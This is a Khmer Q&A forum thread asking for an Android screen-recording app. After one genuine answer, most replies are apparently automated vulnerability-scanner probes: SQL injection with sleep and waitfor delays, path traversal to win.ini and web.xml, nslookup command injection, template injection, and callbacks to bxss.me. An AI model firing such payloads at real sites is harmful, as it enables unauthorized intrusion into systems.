៣០
វិច្ឆិកា

nikato

តើមាន​កម្មវិធី​មួយណាទៅ​ដែល​អាចថត Screen នៅលើ​Android បាន???

ចម្លើយ

Ouspheaktra Phal

សុំទោស​ផង​សម្រាប់​សំណួរ​នេះ ដោយ​ហេតុ​តែ​ខ្ញុំ​មិន​ធ្លាប់​ប្រើ android ដូច្នេះ​ខ្ញុំ​មិន​អាច​ឆ្លើយ​សំនួ​រ​នេះ​បាន​ទេ តែ​យ៉ាង​ណា​ខ្ញុំ​បាន​ស្វែង​រក​តាម google ខ្ញុំ​ឃើញ​ទំព័រ​នេះ ប្រហែល​ជា​អាច​ឆ្លើយ​សំណួរ​បង​បាន http://www.androidauthority.com/android-authority-this-week-may-3-2015-605814/

នៅថ្ងៃ

lgexxhrs

'+response.write (9825181*9331476) +'

នៅថ្ងៃ

lgexxhrs

"+response.write (9825181*9331476) +"

នៅថ្ងៃ

lgexxhrs

response.write (9532299*9089840)

នៅថ្ងៃ

lgexxhrs

'+response.write (9532299*9089840) +'

នៅថ្ងៃ

lgexxhrs

"+response.write (9532299*9089840) +"

នៅថ្ងៃ

lgexxhrs

set|set&set

នៅថ្ងៃ

lgexxhrs

if (now () =sysdate () ,sleep (9) ,0) /*'XOR (if (now () =sysdate () ,sleep (9) ,0) ) OR'"XOR (if (now () =sysdate () ,sleep (9) ,0) ) OR"*/

នៅថ្ងៃ

lgexxhrs

(select (0) from (select (sleep (9) ) ) v) /*'+ (select (0) from (select (sleep (9) ) ) v) +'"+ (select (0) from (select (sleep (9) ) ) v) +"*/

នៅថ្ងៃ

១០

lgexxhrs

-1; waitfor delay '0:0:3' —

នៅថ្ងៃ

១១

lgexxhrs

$ (nslookup vr8OiAiL)

នៅថ្ងៃ

១២

lgexxhrs

-1) ; waitfor delay '0:0:6' —

នៅថ្ងៃ

១៣

lgexxhrs

-1;select pg_sleep (9) ; —

នៅថ្ងៃ

១៤

lgexxhrs

..\..\..\..\..\..\..\..\windows\win.ini

នៅថ្ងៃ

១៥

lgexxhrs

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

នៅថ្ងៃ

១៦

lgexxhrs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

នៅថ្ងៃ

១៧

lgexxhrs

1&n910366=v999021

នៅថ្ងៃ

១៨

lgexxhrs

1some_inexistent_file_with_long_name.jpg

នៅថ្ងៃ

១៩

lgexxhrs

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

នៅថ្ងៃ

២០

lgexxhrs

Http://testasp.vulnweb.com/t/fit.txt

នៅថ្ងៃ

២១

lgexxhrs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

នៅថ្ងៃ

២២

lgexxhrs

http://testasp.vulnweb.com/t/fit.txt?.jpg

នៅថ្ងៃ

២៣

lgexxhrs

if (now () =sysdate () ,sleep (12) ,0) /*'XOR (if (now () =sysdate () ,sleep (12) ,0) ) OR'"XOR (if (now () =sysdate () ,sleep (12) ,0) ) OR"*/

នៅថ្ងៃ

២៤

lgexxhrs

^ (#$! @#$) ( () ) ) ******

នៅថ្ងៃ

២៥

lgexxhrs

1some_inexistent_file_with_long_name.jpg

នៅថ្ងៃ

២៦

lgexxhrs

WEB-INF/web.xml

នៅថ្ងៃ

២៧

lgexxhrs

9cueoxm5') ; waitfor delay '0:0:12' —

នៅថ្ងៃ

២៨

lgexxhrs

AXXX5n8p') ) ; waitfor delay '0:0:4' —

នៅថ្ងៃ

២៩

lgexxhrs

../../../../../../../../../../boot.ini

នៅថ្ងៃ

៣០

lgexxhrs

-1;select pg_sleep (4) ; —

នៅថ្ងៃ

៣១

lgexxhrs

-1) ;select pg_sleep (4) ; —

នៅថ្ងៃ

៣២

lgexxhrs

X0YSA6iW';select pg_sleep (8) ; —

នៅថ្ងៃ

៣៣

lgexxhrs

������������������������������������������������windows��win.ini

នៅថ្ងៃ

៣៤

lgexxhrs

http://testasp.vulnweb.com/t/xss.html?%00.jpg

នៅថ្ងៃ

៣៥

lgexxhrs

http://hitI4G5Rbh4fc.bxss.me/

នៅថ្ងៃ

៣៦

lgexxhrs

$ {@print (md5 (acunetix_wvs_security_test) ) } \

នៅថ្ងៃ

៣៧

lgexxhrs

) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) )

នៅថ្ងៃ

៣៨

lgexxhrs

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

នៅថ្ងៃ

៣៩

lgexxhrs

(select convert (int,CHAR (65) ) )

នៅថ្ងៃ

៤០

lgexxhrs

/www.vulnweb.com

នៅថ្ងៃ

៤១

lgexxhrs

http://www.vulnweb.com

នៅថ្ងៃ

៤២

lgexxhrs

WEB-INF\web.xml

នៅថ្ងៃ

៤៣

lgexxhrs

//www.vulnweb.com

នៅថ្ងៃ

៤៤

lgexxhrs

'" () &%

នៅថ្ងៃ

៤៥

lgexxhrs

/\www.vulnweb.com

នៅថ្ងៃ

៤៦

lgexxhrs

1

នៅថ្ងៃ

៤៧

lgexxhrs

acu5746<s1﹥s2ʺs3ʹuca5746

នៅថ្ងៃ

៤៨

lgexxhrs

JELmCSB9';select pg_sleep (3) ; —

នៅថ្ងៃ

៤៩

lgexxhrs

................windowswin.ini

នៅថ្ងៃ

៥០

lgexxhrs

8d6ee5EY') ;select pg_sleep (3) ; —

នៅថ្ងៃ

៥១

lgexxhrs

aQiRYibg') ) ;select pg_sleep (6) ; —

នៅថ្ងៃ

៥២

lgexxhrs

testasp.vulnweb.com

នៅថ្ងៃ

៥៣

lgexxhrs

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

នៅថ្ងៃ

៥៤

lgexxhrs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

នៅថ្ងៃ

៥៥

lgexxhrs

(select (0) from (select (sleep (4) ) ) v) /*'+ (select (0) from (select (sleep (4) ) ) v) +'"+ (select (0) from (select (sleep (4) ) ) v) +"*/

នៅថ្ងៃ

៥៦

lgexxhrs

-1; waitfor delay '0:0:8' —

នៅថ្ងៃ

៥៧

lgexxhrs

Http://testasp.vulnweb.com/t/fit.txt

នៅថ្ងៃ

៥៨

lgexxhrs

-1) ; waitfor delay '0:0:8' —

នៅថ្ងៃ

៥៩

lgexxhrs

! ( () &&! |*|*|

នៅថ្ងៃ

៦០

lgexxhrs

WEB-INF\web.xml

នៅថ្ងៃ

៦១

lgexxhrs

http://testasp.vulnweb.com/t/fit.txt?.jpg

នៅថ្ងៃ

៦២

lgexxhrs

-1) ) ; waitfor delay '0:0:8' —

នៅថ្ងៃ

៦៣

lgexxhrs

^ (#$! @#$) ( () ) ) ******

នៅថ្ងៃ

៦៤

lgexxhrs

testasp.vulnweb.com

នៅថ្ងៃ

៦៥

lgexxhrs

1 waitfor delay '0:0:12' —

នៅថ្ងៃ

៦៦

lgexxhrs

../../../../../../../../../../windows/win.ini

នៅថ្ងៃ

៦៧

lgexxhrs

PpEFL1cu'; waitfor delay '0:0:12' —

នៅថ្ងៃ

៦៨

lgexxhrs

-1) ) ;select pg_sleep (4) ; —

នៅថ្ងៃ

៦៩

lgexxhrs

../../../../../../../../../../windows/win.ini.jpg

នៅថ្ងៃ

៧០

lgexxhrs

;print (md5 (acunetix_wvs_security_test) ) ;

នៅថ្ងៃ

៧១

lgexxhrs

OV6jyBek') ;select pg_sleep (8) ; —

នៅថ្ងៃ

៧២

lgexxhrs

';print (md5 (acunetix_wvs_security_test) ) ;$a='

នៅថ្ងៃ

៧៣

lgexxhrs

Dlr89ylk') ) ;select pg_sleep (8) ; —

នៅថ្ងៃ

៧៤

lgexxhrs

";print (md5 (acunetix_wvs_security_test) ) ;$a="

នៅថ្ងៃ

៧៥

lgexxhrs

................windowswin.ini

នៅថ្ងៃ

៧៦

lgexxhrs

$ {@print (md5 (acunetix_wvs_security_test) ) }

នៅថ្ងៃ

៧៧

lgexxhrs

$ {@print (md5 (acunetix_wvs_security_test) ) } \

នៅថ្ងៃ

៧៨

lgexxhrs

;print (md5 (acunetix_wvs_security_test) ) ;

នៅថ្ងៃ

៧៩

lgexxhrs

';print (md5 (acunetix_wvs_security_test) ) ;$a='

នៅថ្ងៃ

៨០

lgexxhrs

..\..\..\..\..\..\..\..\windows\win.ini

នៅថ្ងៃ

៨១

lgexxhrs

http://testasp.vulnweb.com/t/xss.html?%00.jpg

នៅថ្ងៃ

៨២

lgexxhrs

";print (md5 (acunetix_wvs_security_test) ) ;$a="

នៅថ្ងៃ

៨៣

lgexxhrs

$ {@print (md5 (acunetix_wvs_security_test) ) }

នៅថ្ងៃ

៨៤

lgexxhrs

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

នៅថ្ងៃ

៨៥

lgexxhrs

http://hit7LtxGiEIGm.bxss.me/

នៅថ្ងៃ

៨៦

lgexxhrs

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

នៅថ្ងៃ

៨៧

lgexxhrs

/www.vulnweb.com

នៅថ្ងៃ

៨៨

lgexxhrs

acu6171<s1﹥s2ʺs3ʹuca6171

នៅថ្ងៃ

៨៩

lgexxhrs

http://www.vulnweb.com

នៅថ្ងៃ

៩០

lgexxhrs

{ {9999208*9999139} }

នៅថ្ងៃ

៩១

lgexxhrs

! ( () &&! |*|*|

នៅថ្ងៃ

៩២

lgexxhrs

(select convert (int,CHAR (65) ) )

នៅថ្ងៃ

៩៣

lgexxhrs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

នៅថ្ងៃ

៩៤

lgexxhrs

) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) )

នៅថ្ងៃ

៩៥

lgexxhrs

WEB-INF/web.xml

នៅថ្ងៃ

៩៦

lgexxhrs

1'" () &%

នៅថ្ងៃ

៩៧

lgexxhrs

//www.vulnweb.com

នៅថ្ងៃ

៩៨

lgexxhrs

/\www.vulnweb.com

នៅថ្ងៃ

៩៩

lgexxhrs

acux10177��z1��z2a�bcxuca10177

នៅថ្ងៃ

១០០

lgexxhrs

1'" () &%

នៅថ្ងៃ

១០១

lgexxhrs

'" () &%

នៅថ្ងៃ

១០២

lgexxhrs

acux7638��z1��z2a�bcxuca7638

នៅថ្ងៃ

១០៣

lgexxhrs

{ {9999169*9999973} }

នៅថ្ងៃ

១០៤

lgexxhrs

1

នៅថ្ងៃ

១០៥

lgexxhrs

&nslookup 2vmbAGBD&'\"`0&nslookup 2vmbAGBD&`'

នៅថ្ងៃ

១០៦

lgexxhrs

1 waitfor delay '0:0:6' —

នៅថ្ងៃ

១០៧

lgexxhrs

../../../../../../../../../../windows/win.ini

នៅថ្ងៃ

១០៨

lgexxhrs

7ojp03IR'; waitfor delay '0:0:9' —

នៅថ្ងៃ

១០៩

lgexxhrs

oLRgeJD0') ; waitfor delay '0:0:9' —

នៅថ្ងៃ

១១០

lgexxhrs

../../../../../../../../../../boot.ini

នៅថ្ងៃ

១១១

lgexxhrs

12345'"\'\") ;|] * { <>�''💩

នៅថ្ងៃ

១១២

lgexxhrs

FzMoYneO') ) ; waitfor delay '0:0:9' —

នៅថ្ងៃ

១១៣

lgexxhrs

../../../../../../../../../../windows/win.ini.jpg

នៅថ្ងៃ

១១៤

lgexxhrs

response.write (9825181*9331476)

នៅថ្ងៃ

១១៥

lgexxhrs

$ (nslookup Mg0dKDBg)

នៅថ្ងៃ

១១៦

lgexxhrs

&nslookup 8pmKiCen&'\"`0&nslookup 8pmKiCen&`'

នៅថ្ងៃ

១១៧

lgexxhrs

set|set&set

នៅថ្ងៃ

១១៨

lgexxhrs

-1) ) ; waitfor delay '0:0:6' —

នៅថ្ងៃ

១១៩

lgexxhrs

$ {9999767+10000348}

នៅថ្ងៃ

១២០

lgexxhrs

������������������������������������������������windows��win.ini

នៅថ្ងៃ

១២១

lgexxhrs

-1) ;select pg_sleep (3) ; —

នៅថ្ងៃ

១២២

lgexxhrs

12345'"\'\") ;|] * { <>�''💩

នៅថ្ងៃ

១២៣

lgexxhrs

-1) ) ;select pg_sleep (3) ; —

នៅថ្ងៃ

១២៤

lgexxhrs

$ {9999526+10000030}

នៅថ្ងៃ

ចម្លើយរបស់អ្នក

សូមឆ្លើយចម្លើយ​ជាខ្មែរទៅនឹង​សំណួរខាងលើ ។

ដើម្បីអាចឆ្លើយតបនឹងសំណួរនេះ សូមឡុកចូលទៅគណនីរបស់អ្នកជាមុនសិនដោយចុចត្រង់នេះ

ឆ្លើយតាម Facebook